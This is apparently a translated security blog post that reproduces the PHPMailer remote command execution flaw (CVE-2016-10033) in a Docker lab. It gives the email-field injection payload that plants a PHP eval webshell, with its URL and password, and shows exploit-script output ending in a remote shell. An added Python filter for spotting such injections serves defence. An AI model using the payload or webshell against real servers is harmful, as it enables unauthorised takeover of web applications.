PHPMailer remote command execution vulnerability reproduction
I. Vulnerability introduction
PHPMailer is a PHP class for creating and sending email that is used by many open source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and so on.
PHPMailer < 5.2.18 contains a vulnerability (CVE-2016-10033) that allows an unauthenticated remote attacker to execute arbitrary code in the context of the web server user and thereby remotely control the target web application.
II. Affected versions:
PHPMailer < 5.2.18
III. Vulnerability reproduction
Docker environment:
docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033
Pull the image and start the environment:
http://192.168.1.107:8080/
Open the page, enter any name such as "aaa" in the name field, and in the email field enter: -queuedirectory =/ TMP /. -x /var/www/ HTML/[email protected] <? PHP @eval($_POST['thelostworld']) ? >
This uploads a one-line webshell ("one-word Trojan"). The page takes 3-5 minutes to respond, so expect a long wait.
Webshell address: http://192.168.1.107:8080/a.php, password: thelostworld
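As an added, defensive counterpart to the form injection above (example code written for this article, not part of the original post and not PHPMailer's own fix, which is to upgrade to 5.2.18 or later): a pre-filter that rejects a sender address carrying whitespace or option-like tokens before the value reaches any mail library, and reports a reason that can be logged. The sample submissions, the option names and the helper names are constructed.

```python
import re

# Conservative shape for a single plain address: no whitespace, no quoting.
_ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def check_sender(value: str):
    """Return (ok, reason). ok is True only for a plain, single address.

    The injected value on the vulnerable form is a quoted name followed by
    whitespace-separated tokens that begin with '-', which the mailer then
    hands on to sendmail. Whitespace and option-like tokens are therefore
    rejected before the value reaches any mail library.
    """
    if any(ch.isspace() for ch in value):
        flagged = [t for t in value.split() if t.startswith("-")]
        if flagged:
            return False, "option-like tokens in address: " + " ".join(flagged)
        return False, "whitespace in address"
    if '"' in value or "\\" in value:
        return False, "quoting characters in address"
    if not _ADDR_RE.match(value):
        return False, "address does not match expected shape"
    return True, "ok"


def rejected_submissions(submissions):
    """Return [(email, reason)] for every submission check_sender rejects."""
    out = []
    for sub in submissions:
        ok, reason = check_sender(sub["email"])
        if not ok:
            out.append((sub["email"], reason))
    return out


# Constructed sample submissions (not real traffic). The second one mimics
# the shape of the injected value, with placeholder option names.
SAMPLE_SUBMISSIONS = [
    {"name": "alice", "email": "alice@example.com"},
    {"name": "aaa", "email": '"aaa" -opt1=/tmp/ -opt2/tmp/x bob@example.com'},
    {"name": "carol", "email": "carol@example.org"},
]

if __name__ == "__main__":
    for email, reason in rejected_submissions(SAMPLE_SUBMISSIONS):
        print(f"REJECT {email!r}: {reason}")
```

The same check can be run over archived form submissions or web-server logs to find past attempts against a form that was exposed while the vulnerable version was deployed.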
Virtual terminal:
Using a script:
To obtain the script, reply "PHPMailer" to the official account in the background.
➜ Desktop ./exploitor.sh 192.168.1.107:8080
[+] CVE-2016-10033 Exploits by Opsxcq
[+] Exploiting 192.168.1.107:8080
[+] Target exploited, Acessing shell at http://192.168.1.107:8080/backdoor.php
[+] Checking if the backdoor was created on the target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell>
[+] Running
RemoteShell> id
[+] Running id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Access the webshell address:
http://192.168.1.107:8080/backdoor.php
References:
www.cnblogs.com/Hi-blog/p/7…
www.exploit-db.com/exploits/40…
Disclaimer: The security tools and procedures (methods) provided on this site may be offensive and are intended only for security research and teaching; use them at your own risk!
Disclaimer: Copyright belongs to the author. For commercial reprinting, please contact the author for authorization; for non-commercial reprinting, please indicate the source.
thelostworld